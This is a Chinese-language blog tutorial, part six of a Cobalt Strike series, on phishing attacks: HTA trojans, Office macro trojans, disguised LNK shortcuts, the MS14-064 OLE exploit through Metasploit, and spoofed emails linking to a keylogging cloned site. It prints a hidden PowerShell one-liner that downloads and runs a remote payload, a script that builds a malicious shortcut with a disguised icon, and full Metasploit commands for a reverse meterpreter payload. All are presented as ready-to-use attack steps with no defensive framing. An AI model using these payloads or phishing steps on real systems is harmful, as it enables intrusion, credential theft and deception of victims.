内网渗透神器CobaltStrike之钓鱼攻击(六)

女爷i 2023-10-07 21:23 49阅读 0赞

## 一、HTA木马 ##

### 简介 ###

HTA是HTML Application的缩写，直接将HTML保存成HTA的格式，是一个独立的应用软件。HTA虽然用HTML、JS和CSS编写，却比普通网页权限大得多，它具有桌面程序的所有权限。就是一个html应用程序，双击就能运行

HTA木马一般配合网站克隆进行钓鱼攻击

### 步骤 ###

生成HTML后门(HTA文件), 选择相应的监听器和模式,有三种模式,分别为`Powershell`、`VBA`、`Executable`

> Executable 将会在hta文件中内嵌一个PE文件  
> Powershell 将会在hta文件中内嵌一段Powershell代码  
> VBA 将会在hta文件中内嵌一段VBA代码

![image-20221006215055595][]

![image-20221006215143328][]

![image-20221006220530926][]

将hta木马上传至服务器提供给用户下载, 返回木马的url路径

![image-20221006225053815][]

![image-20221006225147120][]

自行选择一个网站进行克隆, 并在attack选项处选择上传的HTA木马, 随后返回的钓鱼链接`http://192.168.47.134:80/`

![image-20221006225540887][]

![动画][71574f89991efd00346cab42e2451feb.gif]

受害机用浏览器访问钓鱼链接后, 网站会咨询用户是否下载木马文件, 若用户下载且运行, 则用户在CS上线

![动画][31b4b82501040474a8675e29cac803c7.gif]

## 二、Office宏木马 ##

### 简介 ###

office钓鱼在无需交互、用户无感知的情况下，执行Office文档中内嵌的一段恶意代码，从远控地址中下载并运行恶意可执行程序，例如远控木马或者勒索病毒等。Cobalt Strike office钓鱼主要方法是生成一段vba代码，然后将代码复制到office套件中，当用户启动office自动运行

### 步骤 ###

首先安装wps的宏插件, 不然无法在wps文档插入宏代码

![image-20221006210722868][]

在攻击选项选择`MS Office Macro`生成恶意宏代码

![img][]

![img][img 1]

打开新建的doc文档, 在开发工具栏点击宏选项, 新建一个宏

![img][img 2]

将CS生成的宏代码复制至文档中, 然后将文件类型保存为docm类型

![img][img 3]

![img][img 4]

## 三、LINK钓鱼 ##

### 简介 ###

lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件，通常它以快捷方式放在硬盘上，以方便使用者快速的调用。lnk钓鱼主要将图标伪装成正常图标，但是目标会执行shell命令

例如创建一个简单的powershell文件, 先创建一个txt文件, 并对其写入如下代码, 随后将其后缀名改为ps1, 右键单击此文件选择powershell执行, 运行后会弹出计算器

cmd /c calc.exe

![1][]

### 步骤 ###

选择`钓鱼攻击>Scripted Web Delivery`, 生成PowerShell远程执行代码

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.47.134:80/a'))"

![image-20221008093244770][]

![image-20221008093510210][]

按照上面做的简单powershell步骤,将其内容里的calc.exe换成powershell代码, 保存为test.txt文件

cmd /c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.47.134:80/a'))"

![image-20221008094547272][]

创建LNK.ps1文件, 将如下代码写入进去, 然后右键powershell执行后, 会在文件当前目录下生成test.lnk文件

若受害机运行了test.lnk文件, 则在CS上线

> 注意:LNK.ps1和test.txt要在同一目录下

$file = Get-Content "test.txt"
    $WshShell = New-Object -comObject WScript.Shell
    $Shortcut = $WshShell.CreateShortcut("test.lnk")
    $Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"  
    $Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
    $Shortcut.Arguments = ''+ $file
    $Shortcut.Save()

## 四、OLE远程代码执行(MS14-064) ##

### 简介 ###

Microsoft Windows OLE 远程代码执行漏洞，影响Win95+IE3 - Win10+IE11全版本

通过MSF生成恶意url连接, 配合CS克隆网站进行钓鱼攻击, 然后受害机在CS上线

### 准备环境 ###

<table> 
 <thead> 
  <tr> 
   <th>主机</th> 
   <th>描述</th> 
  </tr> 
 </thead> 
 <tbody> 
  <tr> 
   <td>192.168.47.134(kali)</td> 
   <td>CS服务器</td> 
  </tr> 
  <tr> 
   <td>192.168.47.144(kali)</td> 
   <td>MSF</td> 
  </tr> 
  <tr> 
   <td>192.168.47.133(win7)</td> 
   <td>CS客户端,攻击机</td> 
  </tr> 
  <tr> 
   <td>192.168.47.141(win7)</td> 
   <td>受害机</td> 
  </tr> 
 </tbody> 
</table>

### 步骤 ###

在kali上输入`msfconsole`打开metasploit, 再输入`use exploit/windows/browser/ms14_064_ole_code_execution`选择相应模块

然后输入如下命令开始执行攻击, 随后会返回一个url钓鱼连接:`http://192.168.47.144:8080/lCKUuRHyz1`

set srvhost 192.168.47.144 //设置msf服务器的ip
    
    set srvport 8080  //设置恶意连接的访问端口
    
    set payload windows/meterpreter/reverse_http  //设置监听协议
    
    set allowpowershellprompt true  //使用powershell执行代码
    
    set lhost 192.168.47.134  //设置监听服务器的ip
    
    set lport 80  //设置监听服务器的端口
    
    run  //开始执行

![image-20221007163250674][]

在CS生成克隆网站, 攻击选项处填写刚生成的url钓鱼链接, 生成的克隆网站链接为`http://192.168.47.134:80/baidu`

![image-20221007164045381][]

![image-20221007164105955][]

受害机访问克隆网站后会弹出警告框, 询问你是否允许执行powershell, 若点击允许则在CS成功上线

![2][]

![image-20221007164633910][]

## 五、钓鱼邮件 ##

### 简介 ###

利用Cobalt Strike生成钓鱼邮件对企业或者网站的邮箱进行攻击, 钓鱼邮件的内容通常包含Office宏木马附件, 钓鱼网站等等

Cobalt Strike钓鱼邮件攻击需确定如下信息:

*  目标邮箱
 *  邮件模板
 *  smtp账号

### 步骤 ###

首先确保你邮箱开启了SMTP服务,这里我以163邮箱为例, 需开启`POP3/SMTP`服务

![1][1 1]

开启了smtp服务后会自动生成一个授权密码, 在后面CS填写smtp信息会用到

![image-20221007231641595][]

在网页邮箱可以查看邮件的模板, 将模板内容保存至`Mail Template.txt`文件

![image-20221007232822248][]

![image-20221007232952769][]

将目标邮箱以及收件人的信息保存在Mail.txt文件, 注意这两者之间相隔一个tab键的距离

![image-20221007233150078][]

CS攻击选择邮件钓鱼

![image-20221007233256046][]

填写钓鱼攻击所需的信息,在Mail Server的密码框要填写上面开启SMTP服务所生成的授权密码, 填写完毕后点击Send发送邮件

![image-20221007234047285][]

> Targets:存有目标邮箱及收件人信息的文本文件
> 
> Template:邮件模板文件
> 
> Attachment:附件
> 
> Embed URL:填写url钓鱼链接, 可将邮件的内置链接替换掉。此处我填写了带有键盘记录功能的克隆网站
> 
> Mail Server: 邮箱服务器相关信息
> 
> Bounce to:邮箱地址

接收到的钓鱼邮件显示的发件人是和原邮件一模一样的，且邮件的链接都被替换成了钓鱼链接

![3][]

点击链接跳转至钓鱼页面，在输入框输入内容会被传输至CS服务器，可在CS客户端打开Web日志进行查看键盘记录

![1][1 2]

![1][1 3]

[image-20221006215055595]: https://img-blog.csdnimg.cn/img_convert/6197d938f877d931dbc206ce4260ba14.png
[image-20221006215143328]: https://img-blog.csdnimg.cn/img_convert/0feb29e4d6f32a993e521879d46f5aee.png
[image-20221006220530926]: https://img-blog.csdnimg.cn/img_convert/6c800150f65244aa7a7e98afd17eb13c.png
[image-20221006225053815]: https://img-blog.csdnimg.cn/img_convert/3e680bfc59911b902df9626ad5073931.png
[image-20221006225147120]: https://img-blog.csdnimg.cn/img_convert/255dd49877a6c9b3564b2cbaa2359e3a.png
[image-20221006225540887]: https://img-blog.csdnimg.cn/img_convert/2d484a970b4c46fc6931ae81ee6a821f.png
[71574f89991efd00346cab42e2451feb.gif]: https://img-blog.csdnimg.cn/img_convert/71574f89991efd00346cab42e2451feb.gif
[31b4b82501040474a8675e29cac803c7.gif]: https://img-blog.csdnimg.cn/img_convert/31b4b82501040474a8675e29cac803c7.gif
[image-20221006210722868]: https://img-blog.csdnimg.cn/img_convert/c263550dbb31546c4abc064acde33c83.png
[img]: https://img-blog.csdnimg.cn/img_convert/e41c87f7e3661318cc67f040715a8376.jpeg
[img 1]: https://img-blog.csdnimg.cn/img_convert/0e90ea1b49d59e3f01a54ea2171a4544.jpeg
[img 2]: https://img-blog.csdnimg.cn/img_convert/d4bb5bc5b65111339a4bd796ee2e8e33.jpeg
[img 3]: https://img-blog.csdnimg.cn/img_convert/40bdbe7848c69ae55156b5cf57fa2e35.jpeg
[img 4]: https://img-blog.csdnimg.cn/img_convert/bf61c27d06aa81f41e7c53bea8313be5.jpeg
[1]: https://img-blog.csdnimg.cn/img_convert/0302712720dd36052c1299b3989a2b9b.gif
[image-20221008093244770]: https://img-blog.csdnimg.cn/img_convert/e14f7c1bf7b071f4a8f0d061e7d49faf.png
[image-20221008093510210]: https://img-blog.csdnimg.cn/img_convert/183ebb0b4328018a0b5634218a97cf68.png
[image-20221008094547272]: https://img-blog.csdnimg.cn/img_convert/f15fb3bfb9968f0dc62e4762bfe9470b.png
[image-20221007163250674]: https://img-blog.csdnimg.cn/img_convert/8619c3f3fb868ef419b3f6e301b88a74.png
[image-20221007164045381]: https://img-blog.csdnimg.cn/img_convert/e02ce04a3beceaa2b713d4d6de3eeddf.png
[image-20221007164105955]: https://img-blog.csdnimg.cn/img_convert/ce4c9630e1df6ebf02d67183a4c65b46.png
[2]: https://img-blog.csdnimg.cn/img_convert/7534f25af5f9fe372cf63b9c3efa7e01.png
[image-20221007164633910]: https://img-blog.csdnimg.cn/img_convert/7129d766b51eada0c6fa26511c02b062.png
[1 1]: https://img-blog.csdnimg.cn/img_convert/66e0ab14171848f9a203f75d9f07743c.png
[image-20221007231641595]: https://img-blog.csdnimg.cn/img_convert/8b79ef101557a1a49109746c3bc9ca71.png
[image-20221007232822248]: https://img-blog.csdnimg.cn/img_convert/837b609151b57eb5f181d7eabce79e15.png
[image-20221007232952769]: https://img-blog.csdnimg.cn/img_convert/303b5e4c7e4ebc1f891e88f6a0a3a701.png
[image-20221007233150078]: https://img-blog.csdnimg.cn/img_convert/dc47cc1ca11920ff13ce5b844774980a.png
[image-20221007233256046]: https://img-blog.csdnimg.cn/img_convert/cf704d94dcef5c408508b16c77fbc946.png
[image-20221007234047285]: https://img-blog.csdnimg.cn/img_convert/d87bdb1f7d0cff9fdf37b832a60306f4.png
[3]: https://img-blog.csdnimg.cn/img_convert/28251fd0c604b4d911dca41bfbf3b8c1.png
[1 2]: https://img-blog.csdnimg.cn/img_convert/1b38df86238c1bd94e2d2554d9f5e142.png
[1 3]: https://img-blog.csdnimg.cn/img_convert/5798ec93abbea54eb1329816241ea37a.png